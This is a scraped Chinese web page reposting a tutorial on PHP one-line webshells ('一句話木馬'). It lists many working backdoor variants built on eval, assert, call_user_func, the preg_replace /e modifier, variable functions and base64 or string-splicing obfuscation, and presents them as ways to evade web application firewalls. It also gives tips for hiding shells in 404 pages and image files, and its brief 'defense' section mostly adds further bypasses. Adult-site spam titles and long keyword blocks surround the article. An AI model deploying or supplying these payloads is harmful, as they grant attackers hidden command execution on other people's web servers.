婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > php一句話木馬變形技巧

php一句話木馬變形技巧

熱門標簽:安裝電銷外呼系統 百度商鋪地圖標注 地圖標注平臺怎么給錢注冊 衡水外呼系統平臺 注冊400電話申請 福州人工外呼系統哪家強 常州地圖標注服務商 釘釘打卡地圖標注 新河科技智能外呼系統怎么樣

一、什么是一句話木馬?

一句話木馬就是只需要一行代碼的木馬,短短一行代碼,就能做到和大馬相當的功能。為了繞過waf的檢測,一句話木馬出現了無數中變形,但本質是不變的:木馬的函數執行了我們發送的命令。

二、我們如何發送命令,發送的命令如何執行?

我們可以通過 GET、POST、COOKIE這三種方式向一個網站提交數據,一句話木馬用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我們傳遞的數據,并把接收的數據傳遞給一句話木馬中執行命令的函數,進而執行命令。 所以看到的經典一句話木馬大多都是只有兩個部分,一個是可以執行代碼的函數部分,一個是接收數據的部分。

0.eval函數

?php eval($_POST['a']) ?>

其中eval就是執行命令的函數,**$_POST[‘a']**就是接收的數據。eval函數把接收的數據當作PHP代碼來執行。這樣我們就能夠讓插入了一句話木馬的網站執行我們傳遞過去的任意PHP語句。這便是一句話木馬的強大之處。

因為木馬是接收post請求中 “a” 的數據( $_POST[‘a']),所以我們必須以post方法發送數據并且將我們要執行的代碼賦值給“a”。如果把木馬中的post替換成get,那么我么就需要以GET方法發送“a”,

使用 其他函數制作一句話木馬

1.assert函數

?php assert(@$_POST['a']); ?>

2.create_function函數

?php$fun = create_function('',$_POST['a']);$fun();?>

把用戶傳遞的數據生成一個函數fun(),然后再執行fun()

3. call_user_func回調函數

?php@call_user_func(assert,$_POST['a']);?>

call_user_func這個函數可以調用其它函數,被調用的函數是call_user_func的第一個函數,被調用的函數的參數是call_user_func的第二個參數

這樣的一個語句也可以完成一句話木馬。一些被waf攔截的木馬可以配合這個函數繞過waf。

4.preg_replace函數

?php@preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>

這個函數原本是利用正則表達式替換符合條件的字符串,但是這個函數有一個功能——可執行命令

這個函數的第一個參數是正則表達式,按照PHP的格式,表達式在兩個“/”之間。如果我們在這個表達式的末尾加上“e”,那么這個函數的第二個參數就會被當作代碼執行。

5. file_put_contents函數

利用函數生成木馬

?php
$test='?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

函數功能:生成一個文件,第一個參數是文件名,第二個參數是文件的內容。

6.array數組

?php$a='assert';array_map("$a",$_REQUEST);?>

上述定義參數a并賦值‘assert',利用array_map()函數將執行語句進行拼接。最終實現assert($_REQUEST)

?php$item['JON']='assert';$array[]=$item;$array[0]['JON']($_POST["TEST"]);?>

利用函數的組合效果,使得多個參數在傳遞后組合成一段命令并執行。

7.PHP變量函數

?php$a = "eval";$a(@$_POST['a']);?>

第三行使用了變量函數$a,變量儲存了函數名eval,便可以直接用變量替代函數名。

三、如何讓一句話木馬繞過waf ?

waf是網站的防火墻,例如安全狗就是waf的一種。waf通常以關鍵字判斷是否為一句話木馬,但是一句話木馬的變形有很多種,waf根本不可能全部攔截。想要繞過waf,需要掌握各種PHP小技巧,掌握的技巧多了,把技巧結合起來,設計出屬于自己的一句話木馬。

1.PHP可變變量

?php$bb="eval";$aa="bb";$$aa($_POST['a']);?>

看這句就能理解上述語句:$$aa = ( ( (aa) = $ (‘bb') = $bb = “eval”

2.str_replace函數

?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST['a']);?>

函數功能:在第三個參數中,查找第一個參數,并替換成第二個參數。這里第二個參數為空字符串,就相當于刪除"Waldo"。

3. base64_decode函數

?php$a=base64_decode("ZXZhbA==")$a($_POST['a']);?>

這里是base64解密函數,"ZXZhbA=="是eval的base64加密。

4."."操作符

?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST['a']);?>

5.parse_str函數

?php$str="a=eval";parse_str($str);$a($_POST['a']);?>

執行這個函數后,生成一個變量$a,值為字符串"eval"

6.更換數據來源

6.1GET篇

?php $_GET[a]($_GET[b]);  ?>
?php @eval( $_GET[$_GET[b]])>

利用方法:

b=cmdcmd=phpinfo()

6.2利用script代替? 、?>標簽

script language="php">@eval_r($_GET[b])/script>

6.3利用session

7.字符替換或特殊編碼

8.木馬藏匿

1.404頁面

2.圖片木馬,用文件包含調用

四、總結

繞過技巧:

  • 更換執行數據來源
  • 字符替換或者編碼
  • 采取隱匿手段

tips:使用一句話木馬的時候可以在函數前加”@”符,這個符號讓php語句不顯示錯誤信息,增加隱蔽性。

五、防御

1.禁用assert()函數,監控eval()
2.搜索日志的assert。
亦可能繞過:

?php $c=$_GET[n].'t'; @$c($_POST[cmd]); ?>
?php $c=base64_decode('YXNzZXI=').$_GET[n].'t'; @$c($_POST[cmd]); ?>

以上就是php一句話木馬變形技巧的詳細內容,更多關于php一句話木馬變形技巧的資料請關注腳本之家其它相關文章!

您可能感興趣的文章:
  • PHP與SQL語句寫一句話木馬總結
  • php eval函數一句話木馬代碼
  • 一句話木馬的原理及利用分析(asp,aspx,php,jsp)
  • php一句話cmdshell新型 (非一句話木馬)
  • asp,php一句話木馬整理方便查找木馬
  • PHP Web木馬掃描器代碼分享
  • php木馬webshell掃描器代碼
  • PHP Web木馬掃描器代碼 v1.0 安全測試工具
  • 精確查找PHP WEBSHELL木馬的方法(1)
  • Ha0k 0.3 PHP 網頁木馬修改版
  • PHP 木馬攻擊的防御設置方法
  • 全世界最小的php網頁木馬一枚 附PHP木馬的防范方法

標簽:白城 唐山 鶴崗 鷹潭 克拉瑪依 遼陽 柳州 六安

巨人網絡通訊聲明:本文標題《php一句話木馬變形技巧》,本文關鍵詞  php,一句話,木馬,變形,技巧,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《php一句話木馬變形技巧》相關的同類信息!
  • 本頁收集關于php一句話木馬變形技巧的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    亚洲精品日日夜夜| 七七婷婷婷婷精品国产| 亚洲精品一区二区三区四区高清| 亚洲摸摸操操av| 国产91丝袜在线18| 成人免费视频一区二区| 成av人片一区二区| 欧美一区二区三区成人| 国产精品美女久久久久av爽李琼| 日本一区二区三区dvd视频在线| 久久久国产一区二区三区四区小说 | 亚洲人成人一区二区在线观看| 色欧美日韩亚洲| 一区二区三区四区国产精品| 6080国产精品一区二区| 在线影院国内精品| 成人免费电影视频| 伊人一区二区三区| 欧美激情综合在线| 亚洲视频图片小说| 一区二区三区在线免费播放| 日本一区二区综合亚洲| 国产99久久精品| 国产日本一区二区| **性色生活片久久毛片| 中文欧美字幕免费| 国产精品久久久久久久久久久免费看| 国产精品视频在线看| 久久久久国色av免费看影院| 亚洲精品国产高清久久伦理二区| 日韩欧美在线影院| 2017欧美狠狠色| 欧美性生活久久| 不卡视频一二三四| 久久精品人人做| 亚洲一级二级三级| 26uuu国产日韩综合| 亚洲视频网在线直播| 激情成人综合网| 日韩欧美一级二级三级| 色哟哟一区二区三区| 国产a视频精品免费观看| 精品一区二区日韩| 国产美女主播视频一区| 成人免费毛片嘿嘿连载视频| 免费视频一区二区| 欧美亚洲国产怡红院影院| 精品欧美一区二区三区精品久久| 欧美一区二区三区四区视频| 亚洲成人高清在线| 一区二区日韩电影| 亚洲午夜电影在线| 日本三级亚洲精品| 极品美女销魂一区二区三区免费| 国产精品538一区二区在线| 成人午夜短视频| 欧美日韩成人激情| 日韩欧美高清dvd碟片| 国产精品久久精品日日| 亚洲激情第一区| 日本三级韩国三级欧美三级| 高清shemale亚洲人妖| 欧美人动与zoxxxx乱| 久久综合一区二区| 中文字幕亚洲不卡| 亚洲韩国精品一区| 五月婷婷综合在线| 欧美一区二区三区爱爱| 国产成人免费9x9x人网站视频| 国产美女久久久久| 色婷婷综合久久久中文一区二区| 欧美放荡的少妇| 国产视频一区二区在线观看| 中文成人综合网| 欧美曰成人黄网| 久久久天堂av| 91麻豆swag| 欧美嫩在线观看| 亚洲伦理在线精品| 欧美大肚乱孕交hd孕妇| 欧美不卡视频一区| 亚洲欧美日韩成人高清在线一区| 美女视频网站黄色亚洲| 日本欧美一区二区在线观看| 欧美精品一区二区在线观看| 国产亚洲精品资源在线26u| 亚洲综合久久av| 激情五月播播久久久精品| 久久精品国产第一区二区三区 | 国产一区二区成人久久免费影院| 欧美主播一区二区三区美女| 国产亚洲欧美一级| 久久精品国产成人一区二区三区 | 欧美日韩久久久久久| 国产亚洲一区二区三区四区| 天堂成人免费av电影一区| 波多野洁衣一区| 日韩女同互慰一区二区| 一区二区三区不卡在线观看 | 香蕉加勒比综合久久| aaa国产一区| 2017欧美狠狠色| 日韩成人一区二区| 91精品在线免费| 亚洲韩国一区二区三区| 欧美性三三影院| 亚洲免费高清视频在线| 精品午夜一区二区三区在线观看| 欧美一级精品大片| 青娱乐精品视频在线| 欧美网站一区二区| 亚洲蜜臀av乱码久久精品蜜桃| 国产成人精品免费在线| 久久你懂得1024| 成人一级视频在线观看| 国产精品午夜春色av| 成人永久看片免费视频天堂| 亚洲欧美二区三区| 成人精品一区二区三区四区 | 成人激情免费网站| 久久久激情视频| 狠狠色伊人亚洲综合成人| 日韩美女视频在线| 国产精选一区二区三区| 亚洲国产精品高清| 国产精品羞羞答答xxdd| 国产精品免费人成网站| 精品福利视频一区二区三区| 麻豆国产91在线播放| 欧美嫩在线观看| 婷婷丁香久久五月婷婷| 精品国产伦一区二区三区免费| 久久er精品视频| 欧美四级电影在线观看| 综合中文字幕亚洲| 欧美日韩极品在线观看一区| 欧美日韩免费观看一区二区三区| 一区二区三区四区高清精品免费观看 | 亚洲嫩草精品久久| 欧美日韩在线直播| 伦理电影国产精品| 精品国产一区久久| 99久久精品99国产精品| 午夜视频一区在线观看| 欧美sm美女调教| 激情久久五月天| 日韩三级视频中文字幕| 成人av在线资源| 亚洲高清免费视频| 亚洲视频一区二区在线观看| 欧美在线视频你懂得| 国产一区二区三区日韩| 国产精品免费免费| 91精品国产品国语在线不卡| 成人一区二区在线观看| 五月天激情综合| 国产偷v国产偷v亚洲高清| 欧美揉bbbbb揉bbbbb| 麻豆精品新av中文字幕| 亚洲在线一区二区三区| 国产亚洲欧美日韩日本| 69久久99精品久久久久婷婷| 国产99久久久国产精品潘金| 亚洲成人免费在线| 一区二区三区四区在线| 国产精品理论在线观看| 日韩一区二区免费视频| 波多野结衣中文字幕一区| 一区二区三区在线影院| 亚洲手机成人高清视频| 国产精品嫩草影院com| 欧美r级在线观看| 日韩欧美一级精品久久| 国模套图日韩精品一区二区| 日韩电影免费在线观看网站| 久久伊99综合婷婷久久伊| 3d成人动漫网站| 欧美视频一区二区三区| 91论坛在线播放| 日本久久电影网| 91精品国产一区二区人妖| 99国产精品99久久久久久| 另类小说一区二区三区| 久久精品噜噜噜成人av农村| 视频一区二区中文字幕| 日韩电影在线观看一区| 青青草国产成人99久久| 亚洲成人精品在线观看| 秋霞成人午夜伦在线观看| 日韩成人一级大片| 午夜激情综合网| 亚洲午夜羞羞片| 麻豆久久一区二区| 国产激情一区二区三区四区| 大美女一区二区三区| 国产精品18久久久久久久久 | 国产乱子伦视频一区二区三区 | 成人a级免费电影| 成人午夜激情影院| 不卡的av网站|